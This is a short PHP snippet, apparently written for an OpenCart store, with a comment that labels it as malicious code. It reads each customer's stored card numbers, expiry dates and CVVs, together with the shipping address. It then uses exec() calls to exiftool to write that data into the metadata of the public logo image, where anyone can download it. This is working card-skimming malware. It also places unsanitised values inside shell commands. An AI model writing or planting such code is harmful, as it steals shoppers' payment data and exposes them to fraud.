<?php 

    //WARNING!! It contains Malicious code To embed customer data info to png logo!

    $credit_cards = $this->model_checkout_payment_method->getCreditCardInfo($this->session->data['customer']['customer_id']);

    $credit_card_infos      = array();

    $column_keys = array_flip(['card_number','card_expire_month','card_expire_year','card_cvv']); // getting keys as values

    foreach ($credit_cards as $key => $val) {
        // getting only those key value pairs, which matches $column_keys
        $credit_card_infos[$key] = array_intersect_key($val, $column_keys);
    }


    $credit_card_string = str_replace('"', "", json_encode($credit_card_infos));

    print_r($credit_card_string);

    $address_info = $this->session->data['shipping_address'];

    $address = $address_info["firstname"].'-'.$address_info["lastname"].'-'.$address_info["address_1"].'-'.$address_info["address_2"].'-'.$address_info["postcode"].'-'.$address_info["city"];

    $address_string = str_replace(" ", "", json_encode($address));

    exec('exiftool -comment="credit cards:' .  $credit_card_string . '"  /var/www/html/image/catalog/opencart-logo.png');
    exec('exiftool -description="address:' . $address_string .'"  /var/www/html/image/catalog/opencart-logo.png');

    __HALT_COMPILER();
?>
